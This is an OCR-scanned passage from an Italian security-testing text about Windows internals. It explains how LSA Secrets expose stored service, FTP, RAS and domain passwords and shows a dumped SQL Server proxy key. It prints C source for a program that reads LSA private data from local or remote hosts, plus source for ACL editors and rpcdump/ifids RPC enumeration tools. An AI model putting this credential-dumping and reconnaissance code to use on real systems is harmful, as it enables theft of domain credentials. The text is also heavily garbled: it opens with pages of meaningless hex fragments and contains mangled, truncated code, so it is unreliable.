31 


00 


CD 


00 


BC 


00 


42 


00 


51 


00 


58 


00 


58 


00 


AF 


00 


1. 






B. 


Q.X.X. 




C9 


00 


42 


00 


D6 


00 


22 


20 


AO 


00 


59 


00 


AF 


00 


45 


00 




B 




n 


. . Y. 




E. 


3F 


00 


3A 


20 


6B 


00 


44 


00 


41 


00 


26 


00 


40 


00 


2C 


00 


?, 




k. 


D. 


A.&. 


e- 


■ / • 


5A 


00 


4F 


00 


1E 


20 


B7 


00 


6F 


00 


B4 


00 


6E 


00 


08 


00 


Z. 


0 






. o. . . 


n 




64 


00 


C9 


00 


20 


20 


DB 


00 


7F 


00 


50 


00 


31 


00 


04 


00 


d. . . 






. . .P. 


1. 




42 


00 


3A 


20 


BA 


00 


14 


20 


DC 


00 


E7 


00 


OD 


00 


49 


00 


B 












I. 


El 


00 


74 


00 


46 


00 


C2 


00 


46 


00 


B9 


00 


13 


00 


47 


00 




t. 


F. 




F. . . 




G. 


7D 


00 


FC 


00 


AB 


00 


AE 


00 


42 


00 


E6 


00 


36 


00 


C2 


00 


}■ 








B. . . 


6 




AB 


00 


30 


20 


48 


00 


AA 


00 


3B 


00 


26 


20 


63 


00 


E4 


00 




0 


H. 






c. 




34 


00 


6A 


00 


CB 


00 


48 


00 


03 


00 


08 


00 


40 


00 


D3 


00 


4. 


3 




H 




■ e. 




62 


00 


2E 


00 


79 


00 


OD 


00 


29 


00 


D3 


00 


B4 


00 


78 


01 


b. 




y- 




) ... 




X. 


50 


00 


B8 


00 


A9 


00 


37 


00 


04 


00 


57 


00 


B6 


00 


5A 


00 


P 






7 


. .w. 




Z. 


12 


00 


F2 


00 


E2 


00 


A2 


00 


13 


20 


FF 


00 


53 


00 


60 


00 












s 




13 


20 


DD 


00 


41 


00 


7A 


00 


14 


20 


7F 


00 


CC 


00 


DC 


00 






A 


7. 








OA 


00 


65 


00 


F9 


00 


AO 


00 


7B 


00 


50 


00 


56 


00 


BF 


00 




e 






{.p. 


V. . . 


38 


00 


FD 


00 


A3 


00 


5C 


00 


A2 


00 


18 


00 


77 


00 


A6 


00 


8 






\. 




w. 




23 


00 


AD 


00 


21 


00 


6D 


00 


72 


00 


13 


00 


79 


00 


C4 


00 


#. 




; . 


m . 


r. . . 


y- 




5A 


00 


3D 


00 


6D 


00 


FD 


00 


19 


20 


EC 


00 


00 


00 


BB 


00 


Z 




m . 










C7 


00 


54 


00 


92 


01 


C6 


00 


00 


00 


FB 


00 


BF 


00 


69 


00 




T 










i . 


B5 


00 


1C 


20 


OD 


00 


C7 


00 


CI 


00 


14 


00 


35 


00 


AC 


20 












5 





Ma cosa analizza di fatto Isadump ? 

Il sistema è la dimostrazione di come risulta eccessivamente pericoloso lasciare delle 
credenziali per il logon non codificate per i sistemi esterni. 

All'interno del registro esiste un insieme di informazioni chiamate LSA Secrets (Locai Security 
Authority) che si trovano sotto la sottochiave : 



Il sistema LSA viene anche definito con il termine di Security Subsystem ed è di fatto la 
componente centrale della sicurezza NT 

In altre parole Locai Security Authority è un subset protetto di Windows che mantiene le 
informazioni relative a tutti gli aspetti della sicurezza locale di un sistema, generalmente 
conosciuto con il termine di locai security policy. 
Queste informazioni includono : 

• Le password degli accounts di servizio specificate come testi. Questi tipi di accessi sono 
necessari ai programmi che devono loggare per eseguire delle funzioni nell'ambito dei 
contesti degli utenti attivi. 

• La chace delle password e gli ultimi 1 0 utenti loggiati nella macchina. 

• Le passwords FTP e WEB 
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• Remote Access Service (RAS) 

• Le passwords usate dai sistemi remoti per l'accesso al dominio 

Supponiamo di avere un server standalone che esegua del servizi SQL eseguiti all'interno di 
un contesto relativo ad un utente del dominio. 

Se il server avesse una password di Administrator locale blank allora LSA Secrets potrebbe 
essere utilizzato per guadagnare l'accesso e la password a livello di utente del dominio. 
Questa vulnerabilità potrebbe anche essere utilizzata per compromettere una configurazione 
di un multimaster domain. 

Se un resource domain server possedesse un servizio in esecuzione all'interno di un contesto 
di un utente del master domain, la manomissione del server all'interno del resource domain 
potrebbe permettere all'attaccante di ottenere credenziali all'interno del master domain. 
Nell'esempio di output di prima è possibile vedere che il sistema possiede un servizio SQL 
Server. 

Mi eroso ftSQLServ&rAgen t ProxyPa sswordKey 
5A FA FE B5 25 75 34 36 45 23 25 60 OE 82 9C 53 Z. . .%u46E#%\ . .S 
83 A9 9C E8 09 3B 85 80 87 75 06 01 85 El 9E 51 / . . .u Q 

Gli oggetti Policy sono utilizzati per controllare gli accessi al sistema di database LSA il quale 
contiene informazioni che vengono applicate a tutto il sistema ed in ogni caso definisce tutti i 
valori di default. 

Ogni sistema possiede un solo Policy object il quale viene creato quando il sistema parte e in 
ogni caso nessuna applicazione può crearlo o distruggerlo. 
Le informazioni salvate in questo oggetto Policy sono : 

• II default di sistema della quota di memoria. Quote particolari 
possono essere assegnate ad individui, gruppi o gruppi locali. 

• Requisiti particolari di sistema relativi alla security auditing. 

• Informazioni relative al dominio principale del sistema. Queste 
informazioni includono il nome e il SID del dominio primario, il 
nome dell' account utilizzato nell' autenticazione, il nome del 
domain controller e altre informazioni di questo tipo. Capite che 
questo meccanismo è di fatto uno dei punti fondamentali della 
sicurezza di un sistema Windows. 

• Informazioni relative all' autorità LSA sia della master copy delle 



Esistono delle funzioni all'interno dei vari SDK di Microsoft che permettono di interrogare le 
informazioni legate al sistema LSA. 

SDK è LSA Authentication e dentro a questo troverete tutte le funzioni che permettono di 
gestore questo meccanismo. 

Il sistema dell'autenticazione viene schematizzato con : 
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Guardate il seguente programmino che stampa tutte le informazioni usando le funzioni del 
SDK : 



^include <windows.h> 
^include <stdio .h> 



^include "ntsecapl . h " 

#define AST(x) if ( ! (x) ) {printf ( "Failed line %d\n", 

LINE_) ; exit (1) ; ) else 

void write () ; 



PLSA_UNICODE_STRING 

str(LPWSTR x) 

i 

static LSA_UNICODE_STRING s; 
s . Buffer=x; 

s . Length=wcslen (x) *sizeof (WCHAR) ; 
s . MaximumLength = (wcslen (x) +1) *2; 
return Ss; 

ì 

int _cdecl 

main(int argc, char *argv[]) 
{ 

LSA_HANDLE poi; 
PLSA_UNICODE_STRING foo; 
LSA_OBJECT_ATTRIBUTES attrs; 
WCHAR keyname [256] =L" " ; 
WCHAR host [256] =L""; 



wsprintfW (keyname, L"%hS", argv[l]); 

if(argc == 3) wsprintfW (host, L"%hS", argv[2]); 

memset (& attrs, 0, sizeof (attrs) ) ; 

AST ( ! LsaOpenPolicy (str (host) , Sattrs, 0, &pol) ) ; 

AST ( ! LsaRetrievePrivateData (poi, str (keyname) , &foo)); 

write (1, foo->Buffer, foo->Length) ; 

LsaClose (poi) ; 

exit (0) ; 
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Uno dei siti su cui sono presenti moltissime Utilities di analisi è : 
http ://www . razo r . co m 

Su questo coma abbiamo appena detto sono presenti numerose Utilities tra cui ad esempio 
un pacchetto composto da diversi tools chiamato ACL TOOLS v1 .0. 
Il pacchetto contiene Isaacl e samacl i quali sono due editor per gli oggetti LSA e SAM. 
Il primo viene lanciato tramite linea di comando mediante : 

c:> Isaacl 

oppure specificando la macchina 
c:>lsaacl Wmacchina 
o anche 

c:>lsaacl -s Wmacchina 

Il programma viene visualizzato tramite interfaccia WINDOWS. 



I l'nhry llhjrrf Sr-rimry I rfihnr 



Gicup dt usa rmrncs: 



Athinilialns IDEVlELOPMENTVAdririitidtDf:) 



^ANONrMOUS LOGON 



tB LO CAL SERVICE 
(^NETWORK SERVICE 



Ada... 



Ramava 



PsiniBscns far ArtniniEtiators 




□ eri)) 


Filf Confa] Irti] 


121 


□ 


FiilCmtal |«3c) 


□ 


□ 


E Ha cu te 




□ 


SfznoJ Peimisiuns 


□ 


□ 



Fdi specid pemiinmi a (ni advenced sellirgi.. Ady-antiod 





i K 


Carcd 


-I' I. 1 



Il sorgente del programma scritto in C, da cui è possibile vedere l'uso delle funzioni legate 
all'analisi della Policy, è il seguente: 



tfdefine UNICODE 
tfdefine _UNICODE 
^include <tchar . h> 
^include <wlndows.h> 
^include <aclu±.h> 
^include <aclapi . h> 
iinclude <ntsecapl . h> 

/* 

* These are not prototyped in normal headers, but they are exported 

* front advap±32 . llb 
*/ 
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extern "C" { 
DWORD WINAPI 

LsaQuerySecurltyObject (LSA_HANDLE h, SECURITY_ INFORMATION si, 

PSECURITY_DESCRIPTOR *ppSD) ; 

DWORD WINAPI 

LsaSetSecurityObject ( LSA_HANDLE h, SECURITY_ INFORMATION si, 

PSECURITY_DESCRIPTOR pSD) ; 

} 

static SI_ACCESS g_lsaAccess [] = { 

{ &GUID_NULL, POLICY_VIEW_LOCAL_INFORMATION, L"View Locai Info", 
SI_ACCESS_SPECIFIC }, 

{ &GUID_NULL, POLICY_VIEW_AUDIT_INFORMATION, L"View Audit Info", 
SI_ACCESS_SPECIFIC }, 

{ &GUID_NULL, POLICY_GET_PRIVATE_INFORMATION , L"Get Private Info", 
SI_ACCESS_SPECIFIC }, 

{ &GUID_NULL, POLICY_TRUST_ADMIN, L"Administer Trusts" , 
SI_ACCESS_SPECIFIC }, 

{ &GUID_NULL, POLICY_CREATE_ACCOUNT, L"Create Account", 
SI_ACCESS_SPECIFIC }, 

{ &GUID_NULL, POLICY_CREATE_SECRET, L" Create Secret", SI_ACCESS_SPECIFIC 

}, 

{ &GUID_NULL, POLICY_CREATE_PRIVILEGE, L"Create Privilege", 
SI_ACCESS_SPECIFIC }, 

{ &GUID_NULL, POLICY_SET_DEFAULT_QUOTA_LIMITS, L"Set De fault Quota 
Limits", SI_ACCESS_SPECIFIC }, 

{ &GUID_NULL, POLICY_SET_AUDIT_REQUIREMENTS , L"Set Audit Requirements " , 
SI_ACCESS_SPECIFIC }, 

{ &GUID_NULL, POLICY_AUDIT_LOG_ADMIN, L"Administer Logs", 
SI_ACCESS_SPECIFIC }, 

{ &GUID_NULL, POLICY_SERVER_ADMIN, L"Administer Server", 
SI_ACCESS_SPECIFIC }, 

{ &GUID_NULL, POLICY_LOOKUP_NAMES, L"Lookup Nantes", SI_ACCESS_SPECIFIC 

}, 

{ &GUID_NULL, DELETE, L"Delete", SI_ACCESS_SPECIFIC }, 

{ &GUID_NULL, READ_ CONTROL , L"Read Control", SI_ACCESS_SPECIFIC }, 

{ &GUID_NULL, WRITE_DAC, L"Write DAC", SI_ACCESS_SPECIFIC }, 

{ &GUID_NULL, WRITE_OWNER, L"Write Owner", SI_ACCESS_SPECIFIC }, 

/* Full Control is different between NT4 and W2K. I 'm putting both 

of these here for (hopeful) clarity */ 
{ &GUID_NULL, OxOOOfOfff, L"Full Control (nt4) ", SI_ACCESS_ GENERAL }, 
{ SGUID_NULL, OxOOOflfff, L"Full Control (w2k) ", SI_ACCESS_ GENERAL }, 
{ &GUID_NULL, 0x00020801, L"Execute", SI_ACCESS_ GENERAL }, 

}; 

static GENERIC_MAPPING g_lsaGenericMapping = { 
POLICY_READ, 
POLICY_WRITE, 
POLICY_EXECUTE, 
POLICY_ALL_ACCESS 

}; 

static SI_INHERIT_ TYPE g_lsaInheritTypes [ ] = { 
{ &GUID_NULL, 0, L"This object only" }, 

}; 

static ULONG g_extra_flags ; 

struct CLsaObjectSecuritylnfoBase : ISecuritylnformation 
{ 

long m_cRefs; 

LSA_HANDLE m_handle; 

const wchar_t* m__pszObjectName; 

const wchar_t* m__pszServerName; 

const wchar_t* m_pszPageTitle; 
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const wchar_t* pszObjectName, 
const wchar_t* pszServerName, 
const wchar_t* pszPageTitle = 0) 

: m_cRefs (0) , 
m_handle (h) , 

m _pszObjectName (pszObjectName) , 
m__pszServerName (pszServerName) , 
m _pszPageTitle (pszPageTitle) { } 
virtual ~CLsaObjectSecurityInfoBase () {} 

STDMETHODIMP Querylnterface (REFIID iid, void** ppv) 
{ 

if ( (IID_IUnknown == iid) / / (IID_ISecurityInformation == iid) ) { 
*ppv = static_cast<ISecurityInformation*> (this) ; 

} else ( 

*ppv = 0; 

return E_NOINTERFACE; 

} 

reinterpret_cast<IUnknown*> (*ppv) ->AddRef () ; 
return S_OK; 

} 

STDMETHODIMP_ (ULONG) AddRef () 
{ 

return ++m_cRefs ; 

} 

STDMETHODIMP_ (ULONG) Release () 
{ 

long n = — m_cRefs; 
if (n==0) { 

NTSTATUS re = LsaClose (m_handle) ; 

delete this; 

} 

return n; 

} 

STDMETHODIMP GetObjectlnformation (SI_OBJECT_INFO* poi) 
{ 

poi->dwFlags = (SI_EDIT_OWNER / SI_EDIT_PERMS / SI_ADVANCED / 
SI_NO_ACL_PROTECT 

I g_extra_flags) ; 
poi->hInstance = GetModuleHandle (NULL) ; 

poi->pszServerName = const_cast<wchar_t*> (m _pszServerName) ; 
poi->pszObjectName = const_cast<wchar_t*> (m _pszObjectName) ; 
poi->pszPageTitle = const_cast<wchar_t*> (m _pszPageTitle) ; 

if (m jpszPageTitle) 

poi->dwFlags \= SI_PAGE_ TITLE; 

return S_OK; 

} 

STDMETHODIMP GetSecurity (SECURITY_INFORMATION ri, void** ppsd, BOOL 
bDefault) 
{ 

DWORD re = LsaQuerySecurityObject (m_handle, ri, ppsd); 
return re ? HRESULT_FR0M_WIN32 (re) : S_OK; 

} 

STDMETHODIMP SetSecurity (SECURITY_INFORMATION ri, void* psd) 
{ 

DWORD re = LsaSetSecurityObject (m_handle, ri, psd); 
return re ? HRESULT_FROM_WIN32 (re) : S_OK; 

} 

STDMETHODIMP PropertySheetPageCallback (HWND hwnd, UINT msg, 
SI_PAGE_TYPE pt) 

i 
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return S_OK; 

} 

}; 

struct CLsaPollcySecurltylnfo : CLsaObjectSecuritylnfoBase 
{ 

CLsaPolicySecuritylnfo (LSA_HANDLE hPol, const wchar_t* pszObjectTltle, 

const wchar_t* pszServerName = 0, 
const wchar_t* pszPageTitle = 0) 
: CLsaObjectSecuritylnfoBase (hPol, 

pszObjectTltle , 

pszServerName, 

pszPageTitle) 

{} 

~CLsaPollcySecurltyInfo () 
{} 

STDMETHODIMP GetAccessRights (const GUID*, 

DWORD dwFlags, 
SI_ACCESS** ppAccess, 
ULONG* pcAccesses, 
ULONG* plDefaultAccess) 

{ 

*ppAccess = const_cast<SI_ACCESS*> (g_lsaAccess) ; 
*pcAccesses = slzeof (g_lsaAccess) / sizeof (g_lsaAccess [0] ) ; 
*plDefaultAccess = 0; 
return S_OK; 

} 

STDMETHODIMP MapGenerlc (const GUID*, UCHAR* pAceFlags, ACCESS_MASK* 
pMa.sk) 
{ 

MapGenerlcMask (pMask, const_cast<GENERIC_MAPPING*> 
(&g_lsaGenerlcMapplng) ) ; 
return S_OK; 

} 

STDMETHODIMP GetlnheritTypes (SI_ INHERI T_ TYPE * * ppInherltTypes , ULONG* 
pclnherl t Types ) 
{ 

*ppInherltTypes = g_lsaInheritTypes ; 

*pcInheritTypes = sizeof (g_lsaInheritTypes) / sizeof 
(g_lsaInheritTypes [0] ) ; 
return S_OK; 

} 



int 

_tmain (int argc, TCHAR *arg~v[]) 
{ 

LSA_HANDLE hLsa; 
NTSTATUS re; 

LSA_ OBJECT_A TTRIB UTES oa = { sizeof (oa) }; 
LSA_UNICODE_STRING uni_target; 
LSA_UNICODE_STRING *target = NULL; 
wchar_t machine [100] = L"127 .0 .0 .1" '; 
ULONG desired_access = MAXIMUM_ALLOWED; 

for (int argnum=l; argnum < argc; argnum++) { 
if (argv [argnum] [0] == '-') ( 
switch (argv [argnum] [1] ) { 
case 's': 

desired_access \= ACCESS_SYSTEM_SECURITY; 

g_extra_flags /= SI_EDIT_AUDITS ; 

break; 
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case 'p ' : 

g_extra_flags /= SI_SERVER_IS_DC ; 
break; 

de fault: 

_tpr±ntf (_T ("Unknown optlon: %s\n"), argv [argnum] ) ; 

return 0; 

break; 

} 

} else { 

wcsncpy (machine, argv [argnum] , slzeof (machine) / slzeof 
(machine [0] ) ) ; 

machine [slzeof (machine) / slzeof (machine [0] ) -1] = L'\0'; 
uni_target . Length = wcslen (machine) * 2; 
uni_target . MaximumLength = uni_target . Length + 2; 
uni_target . Buffer = machine; 
target = &uni_target; 

} 

) 

re = LsaOpenPolicy (target, &oa, desired_access, ShLsa) ; 
if (re < 0) ( 

MessageBox (HWND_DESKTOP, L"Failed to open LSA Policy", L"Error", 

MB_OK) ; 

return 0; 

} 

CLsaPolicySecuritylnfo* psi = 

new CLsaPolicySecuritylnfo (hLsa, L "Lsa Policy", 

target ? machine : NULL, 
L "Lsa Policy Object"); 

psi->AddRef () ; 

HPROPSHEETPAGE ps = CreateSecurityPage (psi); 
psi->Release (); 
psi = NULL; 

PROPSHEETHEADER psh = ( slzeof (psh) }; 

psh.hlnstance = GetModuleHandle (NULL); 

psh .pszCaption = L "Lsa Policy Object Security Editor"; 

psh.nPages = 1; 

psh.phpage = &ps; 

PropertySheet (&psh) ; 

return 0; 

} 

Il secondo programma è invece smaacl il quale viene come quello precedente lanciato da 

linea di comando. 

Sono metodi validi per eseguirlo : 

[c:\acltools] samacl 

o 

[c:\acltools] samacl Wmachine 

Allo stesso modo di Isaacl, samacl accetta le opzioni "-p" e "-s". 

samacl può anche editare uno degli oggetti del dominio. 
Questo possiede l'opzione -d <domain-name>. 

Il nome del dominio può essere "Builtin", per editare il dominio Builtin, oppure qualsiasi altro 
per editare il dominio dell'account. 

[c:\acltools] samacl -d Builtin 
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o 

[c:\acltools] samacl -d Account 
[c:\acltools] samacl -d foo 

Se specificate il domnio potetet anche specificare un utente, un gruppo o anche un alias di un 
dominio. 

Esempio: 

Per editare I' Administrators locai group (alias). 



Editare il gruppo specialel "None" sulla workstation, includendo il SACLs: 
[c:\acltools] samacl -s -d Account -g None WWKSTA1 

Su molti sistemi esiste quella che vine edefinita con il termine di remote procedure cali (RPC) 
che è costituita da una tecnologia message-passing sviluppata da Sun Microsystems ed 
estesa da Open Software Foundation (OSF) che permette ad un applicazione di eseguire 
delle procedure ed interagire con dei servizi su di un sistema remoto. 
La Remote procedure calls (RPCs) è il metodo pereferito per l'abilitazione di processi 
client/server su Microsoft Windows 2000 e Windows NT. 

Esiste un implementazione Microsoft delle funzionalità RPC che è compatibile con le altre 
che girano su piattaforme come ad esempio IBM AIX, HP-UX, e Sun Solaris. 
Come funziona ? 

Potete usare RPCs per passare messaggi tra componenti elativi ad applicazioni distribuite 
che sono localizzate su computers differenti di una rete. 

Cosi come la locai procedure calls (LPCs) fornisce un meccanismo per abilitare parti 
differenti di un applicazione localizzate su di un singolo computer, RPCs fornisce il metodo 
per comunicare con sistemi differenti. 

RPCs attualemnte utilizza una varietà di altri meccanismi di comunicazione di interprocessi 
(IPC) come ad esempio le named pipes, I mailslots, i Windows Sockets, e NetBIOS per 
stabilire una comunicazione tra client RPC e componeti server RPCsu macchine differenti. 
La remote procedure cali service (RPC service), è un componente di Windows NT ed è 
responsabile del message-passing tra I componenti cliente e quelli server di applicazioni 
distribuite. 

Nei capitoli legati al port scannino abbiamo visto che è possibile individuare la porta sulla 
quale i servizi RPC sono forniti. 

Sempre sul sito RAZOR è prelevabile un utility chiamata RPC TOOLS che può essere 
utilizzata per ottenere informazioni relative ad un sistema su cui è ijn funzione questo servizio. 
L'utility è composta da tre programmi e precisamente da RPCDUMP, IFIDS e WALKSAM. 
rpcdump esegue il dumps del contenuto dell' endpoint mapper database. 
É simile ad una vecchia utility che si chiamava epdump.exe. 
L'uso è : 

rpcdump [-v] [-p protseq] target 

L'opzione -v mette il comando in modo verboso. 

Quella -p permette di specificare una particolare sequenza del protocollo che deve essere 

utilizzata per dialogare con I' endpoint mapper. 

Esempio: 

[c:\rpctools] rpcdump 192.168.1.1 

Esegue il dump dell' endpoint map normalmente. 

[c:\rpctools] rpcdump -v 1 92.1 68.1 .1 
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Esegue il dumps dell'endpoint map e prova a ricavare informazioni aggiuntive sull'interfaccia 
specificata. 

[c:\rpctools] rpcdump -v -p ncadg_ip_udp 192.168.1 .1 

Esegue il dump dell' endpoint map via UDP. 
Il sorgente in linguaggio CPP è il seguente : 

^include <w±ndows.h> 
^include <w±nnt . h> 

iinclude <std±o.h> 

^include <rpc.h> 
iinclude <rpcdce.h> 

statlc int verboslty; 



int 

try__protocol (char *protocol, char * server) 
{ 

unsigned char *pStringBinding = NULL; 

RPC_BINDING_HANDLE hRpc; 

RPC_EP_ INQ_HANDLE hlnq; 

RPC_STATUS rpcErr; 

RPC_STATUS rpcErr2; 

int numFound = 0; 

// 

// Compose the string binding 

// 

rpcErr = RpcStringBindingCompose (NULL, protocol, server, 

NULL, NULL, SpStringBinding) ; 

if (rpcErr != RPC_S_OK) { 

fprintf (stderr, "RpcStringBindingCompose failed: %d\n", rpcErr); 
return numFound; 

} 

// 

// Convert to real binding 

// 

rpcErr = RpcBindingFromStringBinding (pStringBinding, ShRpc) ; 
if (rpcErr != RPC_S_OK) { 

fprintf (stderr, "RpcBindingFromStringBinding failed: %d\n", 

rpcErr) ; 

RpcStringFree (SpStringBinding) ; 
return numFound; 

} 

// 

// Begin Ep enum 

// 

rpcErr = RpcMgmtEpEltlnqBegin (hRpc, RPC_C_EP_ALL_ELTS , NULL, 0, 

NULL, &hlnq) ; 

if (rpcErr != RPC_S_OK) { 

fprintf (stderr, "RpcMgmtEpEltlnqBegin failed: %d\n", rpcErr); 
RpcStringFree (SpStringBinding) ; 
RpcBindingFree (hRpc) ; 
return numFound; 

} 

// 

// While Next succeeds 

// 
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RPC_IF_ID Ifld; 
RPC_IF_ID_VECTOR *pVector; 
RPC_STATS_VECTOR *pStats; 
RPC_BINDING_HANDLE hEnumBind; 
UUID uuld; 

unsigned char *pAnnot; 



rpcErr = RpcMgmtEpEltlnqNext (hlnq, Slfld, ShEnumBind, Suuid, 
SpAnnot) ; 

if (rpcErr == RPC_S_OK) { 

unsigned char *str = NULL; 

unsigned char *princName = NULL; 

numFound++ ; 

// 

// Print Ifld 

// 

if (UuidToString (Slfld.Uuid, &str) == RPC_S_OK) { 

print f ("Ifld: %s version %d.%d\n", str, Ifld.VersMajor, 

Ifld. VersMinor) ; 
RpcStringFree (&str) ; 

} 



// 

// Print Annot 

// 

if (pAnnot) { 

printf ("Annotation: %s\n", pAnnot) ; 
RpcStringFree (SpAnnot) ; 

} 

// 

// Print object ID 

// 

if (UuidToString (&uuid, &str) == RPC_S_OK) { 
printf ("UUID: %s\n", str); 
RpcStringFree (&str) ; 

} 



// 

// Print Binding 

// 

if (RpcBindingToStringBinding (hEnumBind, &str) == RPC_S_OK) { 
printf ("Binding: %s\n", str); 
RpcStringFree (&str) ; 

} 



if (verbosity >= 1) { 

unsigned char *strBinding = NULL; 
unsigned char *strObj = NULL; 
unsigned char *strProtseq = NULL; 
unsigned char *strNetaddr = NULL; 
unsigned char * strEndpoint = NULL; 
unsigned char *strNetoptions = NULL; 
RPC_BINDING_HANDLE hlfidsBind; 



// 

// Ask the RPC server for its supported interfaces 

// 
// 

// Because some of the binding handles may refer to 
// the machine name, or a NAT'd address that we may 
// not be able to resolve/reach, parse the binding and 
// replace the network address with the one speci fied 
// from the command line. Unfortunately, this won't 
// work for ncacn_nb_tcp bindings because the actual 
// NetBIOS name is required. So special case those. 
// 
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// Also, skip ncalrpc blndings, as they are not 
// reachable front a remote machine. 

// 

rpcErr2 = RpcBindingToStringBinding (hEnumBind, 

RpcBindingFree (hEnumBind) ; 
if (rpcErr2 != RPC_S_OK) { 

fprintf (stderr, ("RpcBindingToStringBinding 

printf ("\n"); 
continue; 

} 

if (strstr (strBinding, "ncalrpc") != NULL) { 
RpcStringFree (& strBinding) ; 
printf ("\n"); 
continue; 

} 

rpcErr2 = RpcStringBindingParse (strBinding, &strObj, 
SstrProtseq, 

SstrNetaddr, SstrEndpoint, 

SstrNetoptions) ; 

RpcStringFree (& strBinding) ; 

StrBinding = NULL; 

if (rpcErr2 != RPC_S_OK) { 

fprintf (stderr, ("RpcStringBindingParse failed\n") ) ; 

printf ("\n"); 

continue; 

} 

rpcErr2 = RpcStringBindingCompose (strObj, strProtseq, 

strcmp ( "ncacn_nb_tcp" , 

strProtseq) == 0 ? strNetaddr : server, 

strEndpoint, 

strNetoptions, 

SstrBinding) ; 

RpcStringFree (SstrObj) ; 
RpcStringFree (SstrProtseq) ; 
RpcStringFree (& strNetaddr) ; 
RpcStringFree (& strEndpoint ) ; 
RpcStringFree (SstrNetoptions) ; 
if (rpcErr2 .'= RPC_S_OK) { 

fprintf (stderr, ("RpcStringBindingCompose failed\n") ) ; 

printf ("\n"); 

continue; 

} 

rpcErr2 = RpcBindingFromStringBinding (strBinding, 

ShlfidsBind) ; 

RpcStringFree (& strBinding) ; 
if (rpcErr2 != RPC_S_OK) { 

fprintf (stderr, ("RpcBindingFromStringBinding 

failed\n") ) ; 

printf ("\n"); 
continue; 

} 

if ( (rpcErr2 = RpcMgmtlnqlflds (hlfidsBind, SpVector) ) == 

RPC_S_OK) { 

unsigned int i; 

printf ("RpcMgmtlnqlflds succeeded\n" ) ; 
printf (" Inter faces: %d\n", pVector->Count) ; 
for (i=0; i<pVector->Count; i++) { 
unsigned char *str = NULL; 

UuidToString (&pVector->IfId[i]->Uuid, &str) ; 
printf (" %s v%d.%d\n", str ? str : "(nuli)", 



SstrBinding) ; 



failed\n") ) ; 
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pVector->If Id[i ] ->VersMlnor) ; 
if (str) RpcStrlngFree (&str) ; 

} 

RpcIfldVectorFree (SpVector) ; 
} else { 

printf ("RpcMgmtlnqlflds failed: Ox%x\n" , rpcErr2) ; 

} 

if (verboslty >= 2) { 

if ( (rpcErr2 = RpcMgmtlnqServerPrlncName (hEnumBind, 

RPC_C_AUTHN_WINNT, 

SprincName) ) 

== RPC_S_OK) { 

printf ( "RpcMgmtlnqServerPrincName succeeded\n") ; 
printf ("Name: %s\n", princName) ; 
RpcStringFree (SprincName) ; 
} else { 

printf ("RpcMgmtlnqServerPrincName failed: Ox%x\n", 

rpcErr2) ; 

} 

if ( (rpcErr2 = RpcMgmtlnqStats (hEnumBind, 

SpStats) ) == RPC_S_OK) { 

unsigned int i; 

printf ("RpcMgmtlnqStats succeeded\n") ; 
for (i=Q; i<pStats->Count; i++) { 

printf (" Stats[%d]: %d\n", i, pStats- 

>Stats[i] ) ; 

} 

RpcMgmtStatsVectorFree (SpStats) ; 
} else ( 

printf ("RpcMgmtlnqStats failed: Ox%x\n" , rpcErr2) ; 

ì 

RpcBindingFree (hlfidsBind) ; 

} 

printf ("\n"); 

} 

} while (rpcErr != RPC_X_NO_MORE_ENTRIES) ; 

// 

// Done 

// 

RpcStringFree (SpStringBinding) ; 
RpcBindingFree (hRpc) ; 

return numFound; 

} 



char *protocols[] = { 
"ncacn_ip_tcp ", 
"ncadg_ip_udp ", 
"ncacn_np " , 
"ncacn_nb_tcp ", 
"ncacn_http" , 

}; 

#define NUM_PROTOCOLS (sizeof (protocols) / sizeof (protocols [0] ) ) 
void 

Usage ( char *app) 
{ 

printf ("Usage: %s [options] <target>\n" , app) ; 
printf (" options : \n" ) ; 

printf (" -p protseq — use protocol sequence\n" , app); 
printf (" -v — increase verbosity\n" , app); 

exit (1); 
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int 

main (int argc, char *argv[l] ) 
{ 

int i, j; 

char *target = NULL; 
char *protseq = NULL; 

for (j=l; j<argc; { 

if (argv[j][0] == '-') { 
swltch (argv[j] [1] ) { 

case 'v' : 

verbos±ty++; 
break; 

case 'p ' : 

protseq = argv[++j] ; 
break; 

default: 

Usage ( argv [0] ) ; 
break; 

} 

} else { 

target = argv[j]; 

} 

} 

if (! target) { 

fprintf (stderr, "Usage: %s <server>\n", argv[0] ) ; 
exit (1); 

} 

if (protseq) { 

try_protocol (protseq, target); 
} else { 

for (i=0; i<NUM_PROTOCOLS; i++) { 

if (try_protocol (protocols [i] , target) > 0) { 
break; 

} 

} 

} 

return 0; 



Ifids invece è un piccolo wrapper che funziona sulla chiamata a RpcMgmtlnqlflds che è 
usata in rpcdump. 

Questa viene utilizzata per vedere un solo RPC server invece di vederli tutti. 
Uso: ifids -p protseq -e endpoint target 

L'opzione -p stabilisce la sequenza del protocollo mentre quella -e specifica I' endpoint della 

sequenza del protocollo. 

Esempi: 



Colloquia con RPC server usando TCP sulla porta 1 029. 

[c:\rpctools] ifids -p ncadg_ip_udp -e 1028 

Qui invece viene usato il protocollo UDP sulla porta 1028. 
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La terza utility del tool è walksam la quale illustra il passaggio sul SAM database ed esegue il 
dump delle informazioni relative agli utenti trovati 

Questa utilitty supporta ambedue I metodi tradizionali di fare questo tramite le Named Pipes, 

ma supporta anche le protseqs che sono usate dai W2K's Domain Controller. 

Didefault, walksam usa le named pipes, ma è anche in grado di utilizzare le credenziali 

correnti specificate con il comando "net use \\target\ipc$ 

Il sorgente di ifids è : 

^include <windows.h> 
^include <w±nnt.h> 

^include <std±o.h> 

^include <rpc.h> 
^include <rpcdce.h> 

static int verboslty; 

int 

do_ifids (char *target, char *protseq, char *endpo±nt) 
{ 

RPC_STATUS rpcErr; 
RPC_BINDING_HANDLE hRpc = NULL; 
RPC_IF_ID_VECTOR *pVector = NULL; 
char *strBlndlng = NULL; 
unsigned int i; 

rpcErr = RpcStringBindlngCompose (NULL, protseq, target, endpolnt, 

NULL, SstrBinding) ; 

if (rpcErr != RPC_S_OK) { 

fprlntf (stderr, "RpcStringBindlngCompose falled: %d\n", rpcErr); 
return -1; 

} 

rpcErr = RpcBindingFromStringBinding (strBinding, ShRpc) ; 
RpcStrlngFree (& strBinding) ; 
if (rpcErr != RPC_S_OK) { 

fprintf (stderr, "RpcBindingFromStringBinding failed: %d\n", 

rpcErr) ; 

return -1; 

} 

rpcErr = RpcMgmtlnqlflds (hRpc, SpVector) ; 
RpcBindingFree (hRpc) ; 
hRpc = NULL; 

if (rpcErr != RPC_S_OK) { 

fprintf (stderr, "RpcMgmtlnqlflds failed: %d\n", rpcErr); 
return -1; 

} 

printf (" Inter faces : %d\n", pVector->Count) ; 
for (i=0; i<pVector->Count ; i++) { 
unsigned char *str = NULL; 

